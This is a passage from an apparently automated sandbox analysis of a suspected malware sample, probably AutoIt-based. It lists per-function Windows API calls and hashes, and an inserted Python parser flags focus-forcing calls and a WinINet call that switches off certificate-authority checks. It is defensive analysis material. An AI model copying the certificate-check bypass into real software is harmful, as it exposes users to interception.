                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 000BC8BB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$CtrlParent$_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 313823418-1403004172
                            • Opcode ID: dfd27ee424e599c21c29f441638f68f63d9d8805d9cf33afad2d0e53ddd1fd5b
                            • Instruction ID: 31c1d65b779e41108f6ea9db99f1b8da98320089029fd989ba8b6ab9ef7a434e
                            • Opcode Fuzzy Hash: dfd27ee424e599c21c29f441638f68f63d9d8805d9cf33afad2d0e53ddd1fd5b
                            • Instruction Fuzzy Hash: 0C218375900208BFEF04ABA4DC85EFEB7B5EF49300F104115F591E7192DBB59955AB20
                            APIs
                            • GetParent.USER32 ref: 000BC8D9
                            • GetClassNameW.USER32(00000000,?,00000100), ref: 000BC8EE
                            • _wcscmp.LIBCMT ref: 000BC900
                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 000BC97B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ClassMessageNameParentSend_wcscmp
                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                            • API String ID: 1704125052-3381328864
                            • Opcode ID: 1ff81d402d511772c065219c77d431ab80f1b6aaab5fd919b3caf21c044ee2c8
                            • Instruction ID: a5fcfa62e9a242ec47a531c45f262b391561985912f4821ee51d25104c078b2d
                            • Opcode Fuzzy Hash: 1ff81d402d511772c065219c77d431ab80f1b6aaab5fd919b3caf21c044ee2c8
                            • Instruction Fuzzy Hash: 8A11E976658302B9FA543A70EC0ECEAB7ECDB0B760F200022F910A50D2FBA269414564
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 000DB777
                            • CoInitialize.OLE32(00000000), ref: 000DB7A4
                            • CoUninitialize.OLE32 ref: 000DB7AE
                            • GetRunningObjectTable.OLE32(00000000,?), ref: 000DB8AE
                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 000DB9DB
                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 000DBA0F
                            • CoGetObject.OLE32(?,00000000,0010D91C,?), ref: 000DBA32
                            • SetErrorMode.KERNEL32(00000000), ref: 000DBA45
                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000DBAC5
                            • VariantClear.OLEAUT32(0010D91C), ref: 000DBAD5
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                            • String ID:
                            • API String ID: 2395222682-0
                            • Opcode ID: a675a49350f41262096d7bf274192fd2c6410c464d4e39a9a1bf0e7637fefbcb
                            • Instruction ID: edf9050216226c4780615c4000ea209c7d4af36d07e9c2011b28f77b94166747
                            • Opcode Fuzzy Hash: a675a49350f41262096d7bf274192fd2c6410c464d4e39a9a1bf0e7637fefbcb
                            • Instruction Fuzzy Hash: 0EC11271608345EFC700DF68C884A6AB7E9BF89308F00491EF58A9B351DB71ED45CB62
                            APIs
                            • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 000CB137
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ArraySafeVartype
                            • String ID:
                            • API String ID: 1725837607-0
                            • Opcode ID: 368ae6dc20bc7e33ff2992460ff73af219eeef1ff0aa7642783431410b7b2455
                            • Instruction ID: 6e7094463eb1a717f6b8a71d4ca51cbf4b0efe829888365f009dd69c10857a09
                            • Opcode Fuzzy Hash: 368ae6dc20bc7e33ff2992460ff73af219eeef1ff0aa7642783431410b7b2455
                            • Instruction Fuzzy Hash: 2EC16875A0021ADFDB50CF98D482BAEB7F4FF09315F24406EE646E7291C735AA81CB90
                            APIs
                            • __lock.LIBCMT ref: 000ABA74
                              • Part of subcall function 000A8984: __mtinitlocknum.LIBCMT ref: 000A8996
                              • Part of subcall function 000A8984: EnterCriticalSection.KERNEL32(000A0127,?,000A876D,0000000D), ref: 000A89AF
                            • __calloc_crt.LIBCMT ref: 000ABA85
                              • Part of subcall function 000A7616: __calloc_impl.LIBCMT ref: 000A7625
                              • Part of subcall function 000A7616: Sleep.KERNEL32(00000000,?,000A0127,?,0008125D,00000058,?,?), ref: 000A763C
                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 000ABAA0
                            • GetStartupInfoW.KERNEL32(?,00136990,00000064,000A6B14,001367D8,00000014), ref: 000ABAF9
                            • __calloc_crt.LIBCMT ref: 000ABB44
                            • GetFileType.KERNEL32(00000001), ref: 000ABB8B
                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 000ABBC4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                            • String ID:
                            • API String ID: 1426640281-0
                            • Opcode ID: 871059f4000fe266dd2e012903d010c5ae30d94d1e143c03a20aa68ceac3b137
                            • Instruction ID: 5aad16628e51b22ef3b96bd70bae85623891dc6c623c9fd68daf2df69ce262d4
                            • Opcode Fuzzy Hash: 871059f4000fe266dd2e012903d010c5ae30d94d1e143c03a20aa68ceac3b137
                            • Instruction Fuzzy Hash: 7D81D7709047458FCB24CFA8C844AADBBF0BF4B334B24426DD4A6AB3E2D7749842CB54
                            APIs
                            • __swprintf.LIBCMT ref: 000C7226
                            • __swprintf.LIBCMT ref: 000C7233
                              • Part of subcall function 000A234B: __woutput_l.LIBCMT ref: 000A23A4
                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 000C725D
                            • LoadResource.KERNEL32(?,00000000), ref: 000C7269
                            • LockResource.KERNEL32(00000000), ref: 000C7276
                            • FindResourceW.KERNEL32(?,?,00000003), ref: 000C7296
                            • LoadResource.KERNEL32(?,00000000), ref: 000C72A8
                            • SizeofResource.KERNEL32(?,00000000), ref: 000C72B7
                            • LockResource.KERNEL32(?), ref: 000C72C3
                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 000C7322
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                            • String ID:
                            • API String ID: 1433390588-0
                            • Opcode ID: ccb59cd1561901a5aa4f9de87eb332c55c118e11e6bf90e808bf9bea8ca5a7fc
                            • Instruction ID: 3c4c9d609de166b9e8dd619435da83e4ebccad065f2768aaefe5f885238b692b
                            • Opcode Fuzzy Hash: ccb59cd1561901a5aa4f9de87eb332c55c118e11e6bf90e808bf9bea8ca5a7fc
                            • Instruction Fuzzy Hash: 1F31BEB5A0425ABBCB119FA0EC89EBF7BA9FF09340F004429FD05D2151E774DA90DAA0
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 000C4A7D
                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,000C3AD7,?,00000001), ref: 000C4A91
                            • GetWindowThreadProcessId.USER32(00000000), ref: 000C4A98
                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000C3AD7,?,00000001), ref: 000C4AA7
                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 000C4AB9
                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,000C3AD7,?,00000001), ref: 000C4AD2
                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000C3AD7,?,00000001), ref: 000C4AE4
                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,000C3AD7,?,00000001), ref: 000C4B29
                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,000C3AD7,?,00000001), ref: 000C4B3E
                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,000C3AD7,?,00000001), ref: 000C4B49
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                            • String ID:
                            • API String ID: 2156557900-0
                            • Opcode ID: 1c2031ba1d5fae0c40421e8b570c1fece41b147a95e86053733923438078ce99
                            • Instruction ID: b2f9dd39ac7a17820d6846978f009ea0a5e366f0f989a7a8ac968ec3d7288224
                            • Opcode Fuzzy Hash: 1c2031ba1d5fae0c40421e8b570c1fece41b147a95e86053733923438078ce99
                            • Instruction Fuzzy Hash: 4531CE79601201BFDB209B55EC98F6EB7BABB41311F104009F914E75A0DBF5EE808B60
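The function just listed (GetCurrentThreadId, GetForegroundWindow, GetWindowThreadProcessId, then a run of AttachThreadInput calls) is the standard way to force keyboard focus onto another window: attach the caller's input queue to the foreground window's thread, act, then detach. The identifiers elsewhere in this section (@GUI_DRAGFILE, @GUI_DROPID, CLASSNN, REGEXPCLASS) are AutoIt runtime strings, so this sequence is most likely the interpreter's own WinActivate/ControlFocus support rather than payload logic; the same caution applies to the WinINet function at the end of this section, where InternetSetOptionW is called with option 0x1F (INTERNET_OPTION_SECURITY_FLAGS). The parser below is an added example, not part of the Joe Sandbox report or its tooling: it reads the plugin's per-function "APIs" bullets into call records and flags those two patterns. The wininet.h constant values are the documented ones, the bullet format is assumed to be exactly what this page shows, and the sample input is constructed from lines on this page. The third InternetSetOptionW argument is really a pointer to the flags DWORD, so the decoded value is treated as a hint only.

```python
"""Parse the per-function 'APIs' listings emitted by the Joe Sandbox IDA plugin
and flag an AttachThreadInput focus-forcing sequence and a WinINet call that
rewrites INTERNET_OPTION_SECURITY_FLAGS.  Added example, not report code."""
import re
from collections import namedtuple

Call = namedtuple("Call", "api module args ref subcall")

# One bullet line of an 'APIs' block, e.g.
#   • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 000C4AA7
#   • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
_CALL_RE = re.compile(
    r"^\s*•\s*(Part of subcall function [0-9A-F]+:\s*)?"   # group 1: inlined from a callee
    r"([A-Za-z_@][\w@]*)\.([A-Z0-9_]+)"                    # groups 2,3: API name, module
    r"(?:\(([^)]*)\))?"                                    # group 4: optional argument list
    r",?\s*ref:\s*([0-9A-F]+)"                             # group 5: call-site address
)


def _arg(tok):
    """8 hex digits are the value the plugin resolved; '?' means unresolved."""
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-F]{8}", tok) else tok


def parse_blocks(text):
    """Return a list of functions, each a list of Call records, in report order."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":          # heading that opens a new function
            current = []
            blocks.append(current)
            continue
        m = _CALL_RE.match(line)
        if current is None or not m:
            continue                         # Memory Dump Source / Similarity lines etc.
        args = [_arg(t) for t in m.group(4).split(",")] if m.group(4) else []
        current.append(Call(m.group(2), m.group(3), args,
                            int(m.group(5), 16), bool(m.group(1))))
    return blocks


# Constants from wininet.h (documented values, not taken from the page).
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
SECURITY_FLAGS = {
    0x0100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x0200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x1000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x2000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}


def analyse(blocks):
    """Return (block index, description) for each flagged function."""
    findings = []
    for i, calls in enumerate(blocks):
        names = {c.api for c in calls if not c.subcall}
        # Focus forcing: attach our input queue to the foreground window's thread.
        if {"GetForegroundWindow", "GetWindowThreadProcessId", "AttachThreadInput"} <= names:
            findings.append((i, "AttachThreadInput to foreground window thread (focus forcing)"))
        for c in calls:
            if (c.api == "InternetSetOptionW" and len(c.args) >= 3
                    and c.args[1] == INTERNET_OPTION_SECURITY_FLAGS):
                # The real API takes a pointer to the DWORD; the plugin prints whatever
                # it resolved for that slot, so a decoded value is only a hint.
                bits = c.args[2] if isinstance(c.args[2], int) else 0
                flags = [n for v, n in SECURITY_FLAGS.items() if bits & v]
                findings.append((i, "INTERNET_OPTION_SECURITY_FLAGS rewritten: "
                                    + (", ".join(flags) or "value unresolved")))
    return findings


# Constructed sample in the page's own listing format (copied from the block above
# and from the WinINet function at the end of this section).
SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 000C4A7D
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,000C3AD7,?,00000001), ref: 000C4A91
• GetWindowThreadProcessId.USER32(00000000), ref: 000C4A98
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000C3AD7,?,00000001), ref: 000C4AA7
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,000C3AD7,?,00000001), ref: 000C4B29
Memory Dump Source
• Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
APIs
  • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 000BC782
• GetDlgCtrlID.USER32 ref: 000BC78D
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000D4C5E
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 000D4C8A
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 000D4CCC
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000D4CE1
"""

if __name__ == "__main__":
    for idx, what in analyse(parse_blocks(SAMPLE)):
        print(f"function #{idx}: {what}")
```

Run against the full report text the same way; the "Part of subcall" records are kept but excluded from the name-set match so that a callee's APIs do not make its callers match. Treat both findings as triage hints to be confirmed against the actual disassembly, since the plugin's argument values are static resolutions, not observed runtime values.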
                            APIs
                            • GetClientRect.USER32(?), ref: 000FEC32
                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 000FEC49
                            • GetWindowDC.USER32(?), ref: 000FEC55
                            • GetPixel.GDI32(00000000,?,?), ref: 000FEC64
                            • ReleaseDC.USER32(?,00000000), ref: 000FEC76
                            • GetSysColor.USER32(00000005), ref: 000FEC94
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ClientColorMessagePixelRectReleaseSendWindow
                            • String ID:
                            • API String ID: 272304278-0
                            • Opcode ID: 6df29fd87b1210b46c21980e9a82bb90a87e7c4054c558e56cd6119cbb0c4123
                            • Instruction ID: 340a0385f239deb048db8eb75f13d4dad24c2620260a80d7de27c1abfb2a5b5d
                            • Opcode Fuzzy Hash: 6df29fd87b1210b46c21980e9a82bb90a87e7c4054c558e56cd6119cbb0c4123
                            • Instruction Fuzzy Hash: FB215C31500244AFDB61ABB4FD49BA97BB1EB44321F104220FA66A54F1CB710991EF11
                            APIs
                            • EnumChildWindows.USER32(?,000BDD46), ref: 000BDC86
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ChildEnumWindows
                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                            • API String ID: 3555792229-1603158881
                            • Opcode ID: 39e920db440218e66b1c074e8426ccbbe17120afce9ac60cf751c243737c776f
                            • Instruction ID: 5b9f11e2623c6259ef245d82cd9a759cd1cf680370b2c72d8fda3ede43fee401
                            • Opcode Fuzzy Hash: 39e920db440218e66b1c074e8426ccbbe17120afce9ac60cf751c243737c776f
                            • Instruction Fuzzy Hash: ED91B630A00507EBCF48EF64C881BEEFBB5BF15350F54812AD85AA7152EF706959DBA0
                            APIs
                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000845F0
                            • CoUninitialize.OLE32(?,00000000), ref: 00084695
                            • UnregisterHotKey.USER32(?), ref: 000847BD
                            • DestroyWindow.USER32(?), ref: 000F5936
                            • FreeLibrary.KERNEL32(?), ref: 000F599D
                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 000F59CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                            • String ID: close all
                            • API String ID: 469580280-3243417748
                            • Opcode ID: 59eaac61dcb682e44aaae3e55d4ff59da63c9241e5f7a15b864d8a05b804ef4d
                            • Instruction ID: ee44bc805709a922d7148b026997b2b5de9041c1383e6089c7157d77cda23279
                            • Opcode Fuzzy Hash: 59eaac61dcb682e44aaae3e55d4ff59da63c9241e5f7a15b864d8a05b804ef4d
                            • Instruction Fuzzy Hash: FC915734604602CFC719FF24D895AA8F3F4FF15705F5142A9E58AA7662DB30AE6ACF00
                            APIs
                            • SetWindowLongW.USER32(?,000000EB), ref: 0009C2D2
                              • Part of subcall function 0009C697: GetClientRect.USER32(?,?), ref: 0009C6C0
                              • Part of subcall function 0009C697: GetWindowRect.USER32(?,?), ref: 0009C701
                              • Part of subcall function 0009C697: ScreenToClient.USER32(?,?), ref: 0009C729
                            • GetDC.USER32 ref: 000FE006
                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 000FE019
                            • SelectObject.GDI32(00000000,00000000), ref: 000FE027
                            • SelectObject.GDI32(00000000,00000000), ref: 000FE03C
                            • ReleaseDC.USER32(?,00000000), ref: 000FE044
                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000FE0CF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                            • String ID: U
                            • API String ID: 4009187628-3372436214
                            • Opcode ID: c87c4c5aadc0e7ea414418af2e1c76b48938e8a6d87505d7a254f713d4fe5c2c
                            • Instruction ID: b61bce8668b85024c19ebb6f3b4cba5c1ee81e89c184cb7acbb77a8c8cf29f57
                            • Opcode Fuzzy Hash: c87c4c5aadc0e7ea414418af2e1c76b48938e8a6d87505d7a254f713d4fe5c2c
                            • Instruction Fuzzy Hash: 7C71D131900249EFDF218FA4CC80EFA7BB5FF49350F14426AFE565A5A6CB718881EB51
                            APIs
                              • Part of subcall function 0009AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0009AF8E
                              • Part of subcall function 0009B736: GetCursorPos.USER32(000000FF), ref: 0009B749
                              • Part of subcall function 0009B736: ScreenToClient.USER32(00000000,000000FF), ref: 0009B766
                              • Part of subcall function 0009B736: GetAsyncKeyState.USER32(00000001), ref: 0009B78B
                              • Part of subcall function 0009B736: GetAsyncKeyState.USER32(00000002), ref: 0009B799
                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 000EEB0E
                            • ImageList_EndDrag.COMCTL32 ref: 000EEB14
                            • ReleaseCapture.USER32 ref: 000EEB1A
                            • SetWindowTextW.USER32(?,00000000), ref: 000EEBC2
                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 000EEBD5
                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 000EECAE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                            • API String ID: 1924731296-2107944366
                            • Opcode ID: c68643cc276f089d4299ce810c2c4b86a67869bb18c0b80c4fa76eef1198e56f
                            • Instruction ID: aef6a89f2e8945f88652a62e54b46e486e97d5412508396c64a02b45db7e5206
                            • Opcode Fuzzy Hash: c68643cc276f089d4299ce810c2c4b86a67869bb18c0b80c4fa76eef1198e56f
                            • Instruction Fuzzy Hash: C551CD30204344AFD704EF64DC56FAA7BE5FB88704F104A2DF995972E2DB709984CB62
                            APIs
                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000D4C5E
                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 000D4C8A
                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 000D4CCC
                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000D4CE1
                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D4CEE
                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 000D4D1E
                            • InternetCloseHandle.WININET(00000000), ref: 000D4D65
                              • Part of subcall function 000D56A9: GetLastError.KERNEL32(?,?,000D4A2B,00000000,00000000,00000001), ref: 000D56BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
